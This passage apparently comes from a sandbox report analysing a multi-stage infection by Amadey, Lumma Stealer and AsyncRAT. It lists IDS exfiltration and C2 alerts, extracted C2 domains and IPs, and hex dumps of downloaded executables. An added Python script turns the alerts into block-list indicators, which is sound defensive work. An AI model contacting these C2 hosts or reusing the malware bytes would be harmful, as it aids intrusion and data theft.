Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: k6Sly2p.exe, 00000007.00000002.2626991613.0000000004854000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2626991613.00000000047DB000.00000004.00000800.00020000.00000000.sdmp, k6Sly2p.exe, 00000007.00000002.2833835678.0000000005750000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447686748.0000000000692000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: protobuf-net.pdb source: k6Sly2p.exe, 00000007.00000002.2752047926.0000000004940000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 8_2_00F7DBBE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F868EE FindFirstFileW,FindClose, 8_2_00F868EE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 8_2_00F8698F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F7D076
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F7D3A9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F89642
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8979D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 8_2_00F89B2B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose, 8_2_00F85C97
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_00406301 FindFirstFileW,FindClose, 30_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 30_2_00406CC7

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49738
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49741 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49760 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49784 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49813 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49886 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49913 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.2.4:56194 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49950 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49964 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49972 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49980 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49981 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49995 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:50020 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50019 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50041 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50061 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.4:52437 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50064 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.2.4:50069
Source: Network traffic Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.4:49474 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059427 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (suggestyuoz .biz) : 192.168.2.4:64582 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:63192 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059425 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (lightdeerysua .biz) : 192.168.2.4:61311 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059771 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.4:63192 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059435 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (affordtempyo .biz) : 192.168.2.4:61066 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059431 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mixedrecipew .biz) : 192.168.2.4:57082 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059429 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hoursuhouy .biz) : 192.168.2.4:49980 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059433 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pleasedcfrown .biz) : 192.168.2.4:58531 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50070 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50074 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.4:50073 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50076 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50072 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50077 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50079 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50078 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49964 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49927 -> 172.67.128.154:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49947 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49907 -> 172.67.128.154:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49907 -> 172.67.128.154:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50035 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49976 -> 172.67.128.154:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50066 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50078 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50074 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50071 -> 104.73.234.102:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50008 -> 172.67.128.154:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49916 -> 172.67.128.154:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49916 -> 172.67.128.154:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50020 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50077 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Malware configuration extractor URLs: pleasedcfrown.biz
Source: Malware configuration extractor URLs: affordtempyo.biz
Source: Malware configuration extractor URLs: mixedrecipew.biz
Source: Malware configuration extractor URLs: hoursuhouy.biz
Source: Malware configuration extractor URLs: suggestyuoz.biz
Source: Malware configuration extractor URLs: lightdeerysua.biz
Source: Malware configuration extractor URLs: toppyneedus.biz
Source: Malware configuration extractor URLs: impolitewearr.biz
Source: Malware configuration extractor URLs: edcatiofireeu.shop
Source: Malware configuration extractor IPs: 185.215.113.43
Source: Malware configuration extractor URLs: wodresomdaymomentum.org
Source: Malware configuration extractor URLs: wodresomdaymomentum.org
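The alert list above is long and repetitive, and the configuration extractor output beneath it names a different set of domains than the ones Suricata actually saw resolved or in TLS SNI. The script below is an added example, not part of the Joe Sandbox report, that reduces such lines to per-family C2 indicators and then checks them against the "Malware configuration extractor" entries. Its assumptions are its own: the family keyword table; the C2 side of an alert is whichever endpoint is not a private (RFC 1918) address, because rules such as the Amadey "CnC Response" and the AsyncRAT ja3s rule fire on inbound traffic; DNS alerts contribute the looked-up domain rather than the resolver at 1.1.1.1:53; and a generic rule with no family in its message is attributed to the family that already owns the same endpoint. The embedded lines are a subset of the report's own alert and configuration lines.

```python
"""Pull C2 indicators out of the Suricata alert lines of a sandbox report, attribute
them to a malware family, and check them against the extracted configuration."""
import ipaddress
import re
from collections import defaultdict

# Constructed sample: a subset of the alert and configuration lines above, copied
# verbatim (the report defangs domains with a space before the TLD).
SAMPLE_LINES = """
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49738
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49741 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2059925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (paleboreei .biz) : 192.168.2.4:56194 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059926 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (paleboreei .biz in TLS SNI) : 192.168.2.4:49940 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2059927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebeldettern .com) : 192.168.2.4:52437 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059928 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (rebeldettern .com in TLS SNI) : 192.168.2.4:50065 -> 104.21.0.135:443
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 87.120.113.214:4449 -> 192.168.2.4:50069
Source: Network traffic Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.4:49474 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49976 -> 172.67.128.154:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50008 -> 172.67.128.154:443
Source: Malware configuration extractor URLs: pleasedcfrown.biz
Source: Malware configuration extractor URLs: impolitewearr.biz
Source: Malware configuration extractor URLs: edcatiofireeu.shop
Source: Malware configuration extractor URLs: wodresomdaymomentum.org
Source: Malware configuration extractor IPs: 185.215.113.43
"""

ALERT_RE = re.compile(r"Suricata IDS: (?P<sid>\d+) - Severity \d+ - (?P<msg>.+?) : "
                      r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")
CONFIG_RE = re.compile(r"Malware configuration extractor (?P<kind>URLs|IPs): (?P<value>\S+)$")
DOMAIN_RE = re.compile(r"\(([A-Za-z0-9-]+(?: ?\.[A-Za-z0-9-]+)+)")   # "(paleboreei .biz ..."
FAMILY_KEYWORDS = (("amadey", "Amadey"), ("lumma", "Lumma Stealer"), ("asyncrat", "AsyncRAT"))


def family_of(msg: str) -> str:
    low = msg.lower()
    return next((name for key, name in FAMILY_KEYWORDS if key in low), "unattributed")


def parse_alerts(text: str) -> list:
    """One record per alert line: SID, family, remote endpoint, refanged domain."""
    records = []
    for line in text.splitlines():
        m = ALERT_RE.search(line.strip())
        if not m:
            continue
        # Rules fire in both directions (a CnC response, a server certificate), so the
        # C2 endpoint is whichever side is not the sandbox's private address.
        inbound = (not ipaddress.ip_address(m["src"]).is_private
                   and ipaddress.ip_address(m["dst"]).is_private)
        remote = (m["src"], int(m["sport"])) if inbound else (m["dst"], int(m["dport"]))
        dom = DOMAIN_RE.search(m["msg"])
        records.append({"sid": int(m["sid"]), "msg": m["msg"], "family": family_of(m["msg"]),
                        "remote": remote, "inbound": inbound,
                        "domain": dom.group(1).replace(" ", "") if dom else None})
    return records


def summarize(records: list) -> dict:
    """Group SIDs, C2 endpoints and domains by family."""
    fam = defaultdict(lambda: {"sids": set(), "c2": set(), "domains": set()})

    def add(name, r):
        fam[name]["sids"].add(r["sid"])
        if r["remote"][1] != 53:          # a DNS alert names the resolver, not the C2
            fam[name]["c2"].add("%s:%d" % r["remote"])
        if r["domain"]:
            fam[name]["domains"].add(r["domain"])

    for r in (r for r in records if r["family"] != "unattributed"):
        add(r["family"], r)
    # Generic rules (no family in the message) are folded into the family that already
    # owns the same endpoint; anything left stays unattributed.
    for r in (r for r in records if r["family"] == "unattributed"):
        ep = "%s:%d" % r["remote"]
        add(next((n for n, e in fam.items() if ep in e["c2"]), "unattributed"), r)
    return dict(fam)


def parse_config(text: str) -> dict:
    cfg = {"domains": set(), "ips": set()}
    for line in text.splitlines():
        m = CONFIG_RE.search(line.strip())
        if m:
            cfg["domains" if m["kind"] == "URLs" else "ips"].add(m["value"])
    return cfg


def compare_with_config(summary: dict, cfg: dict) -> dict:
    """Which configured C2s were actually contacted, and which contacts the config lacks."""
    seen_domains = set().union(*(e["domains"] for e in summary.values()))
    seen_ips = {ep.rsplit(":", 1)[0] for e in summary.values() for ep in e["c2"]}
    return {"config_domains_contacted": sorted(cfg["domains"] & seen_domains),
            "config_domains_not_seen": sorted(cfg["domains"] - seen_domains),
            "contacted_not_in_config": sorted(seen_domains - cfg["domains"]),
            "config_ips_contacted": sorted(cfg["ips"] & seen_ips)}


if __name__ == "__main__":
    summary = summarize(parse_alerts(SAMPLE_LINES))
    for name, e in summary.items():
        print(name, sorted(e["c2"]), sorted(e["domains"]), sorted(e["sids"]))
    print(compare_with_config(summary, parse_config(SAMPLE_LINES)))
```

On the sample subset the comparison reports the two Lumma domains that were contacted but are absent from the extracted configuration (paleboreei.biz and rebeldettern.com), and the generic "Suspicious Zipped Filename" POST to 172.67.128.154:443 lands under Lumma Stealer because a Lumma checkin rule already fired on that endpoint. The extractor gives the list embedded in the sample; the traffic shows which hosts it actually used, and both belong in a block list.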
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:07 GMTContent-Type: application/octet-streamContent-Length: 2399744Last-Modified: Tue, 11 Feb 2025 14:56:33 GMTConnection: keep-aliveETag: "67ab6521-249e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 21 8e ab 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 94 24 00 00 08 00 00 00 00 00 00 0a b3 24 00 00 20 00 00 00 c0 24 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 25 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 b2 24 00 4a 00 00 00 00 c0 24 00 9e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 24 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 93 24 00 00 20 00 00 00 94 24 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9e 05 00 00 00 c0 24 00 00 06 00 00 00 96 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 24 00 00 02 00 00 00 9c 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 b2 24 00 00 00 00 00 48 00 00 00 02 00 05 00 6c 35 01 00 bc 1c 02 00 03 00 00 00 ae 06 00 06 28 52 03 00 98 60 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 28 ee 06 00 06 28 b9 06 00 06 2a 56 72 01 00 00 70 80 01 00 00 04 72 5b 00 00 70 80 02 00 00 04 2a 00 00 1e 02 28 33 00 00 0a 2a de 7e 03 00 00 04 2d 15 72 8d 00 00 70 d0 03 00 00 02 2b 0f 2b 14 2b 19 80 03 00 00 04 7e 03 00 00 04 2a 28 34 00 00 0a 2b ea 6f 35 00 00 0a 2b e5 73 36 00 00 0a 2b e0 1a 7e 04 00 00 04 2a 00 2e 2b 06 80 04 00 00 04 2a 02 2b f7 8a 2b 12 72 c3 00 00 70 7e 04 00 00 04 2b 0d 74 3f 00 00 1b 2a 28 04 00 00 06 2b e7 6f 37 00 00 0a 2b ec 00 1e 02 28 38 00 00 0a 2a 1e 02 28 38 00 00 0a 2a 5e 02 28 38 00 00 0a 02 17 8d 4b 00 00 01 25 16 03 9c 7d 05 00 00 04 2a 3a 02 28 38 00 00 0a 02 03 7d 05 00 00 04 2a 00 3a 02 28 38 00 00 0a 02 03 7d 06 00 00 04 2a 00 5e 02 28 38 00 00 0a 02 17 8d 4c 00 00 01 25 16 03 a2 7d 07 00 00 04 2a 3a 02 28 38 00 00 0a 02 03 7d 07 00 00 04 2a 00 2e 2b 06 7b 07 00 00 04 2a 02 2b f7 1e 02 28 38 00 00 0a 2a 1e 02 28 38 00 00 0a 2a 1e 02 28 33 00 00 0a 2a f2 02 28 33 00 00 0a 02 03 28 8f 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Feb 2025 17:17:11 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Tue, 11 Feb 2025 17:08:45 GMTConnection: keep-aliveETag: "67ab841d-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 09 84 ab 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 04 49 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 